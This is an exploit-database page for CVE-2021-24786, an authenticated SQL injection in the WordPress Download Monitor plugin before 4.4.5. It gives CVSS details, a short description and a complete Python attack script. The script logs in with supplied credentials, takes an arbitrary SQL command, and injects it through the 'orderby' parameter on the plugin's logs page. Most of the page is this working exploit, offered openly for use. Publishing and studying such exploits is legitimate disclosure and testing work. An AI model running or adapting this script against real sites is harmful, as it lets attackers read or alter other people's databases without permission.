WordPress Download Monitor WordPress 4.4.4 SQL Injection

2022.02.03
Credit: Ron Jost
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated) # Date 28.01.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.download-monitor.com/ # Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip # Version: < 4.4.5 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24786 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md ''' Description: The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue ''' # Banner: banner = ''' ___ __ ____ ___ ____ _ ____ _ _ _____ ___ __ / __\/\ /\/__\ |___ \ / _ \___ \/ | |___ \| || |___ ( _ ) / /_ / / \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \ / /___ \ V //_|_____/ __/| |_| / __/| |_____/ __/|__ _/ /| (_) | (_) | \____/ \_/\__/ |_____|\___/_____|_| |_____| |_|/_/ \___/ \___/ [+] Download Monitor - SQL-Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse import requests from datetime import datetime # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # Exploit (WORKS ONLY IF ONE LOG EXISTS) print('') print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log') print('') # Generate payload for SQL-Injection sql_injection_code = input('[+] SQL-INJECTION COMMAND: ') sql_injection_code = sql_injection_code.replace(' ', '+') exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id' exploit = session.get(exploitcode_url) print(exploit) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top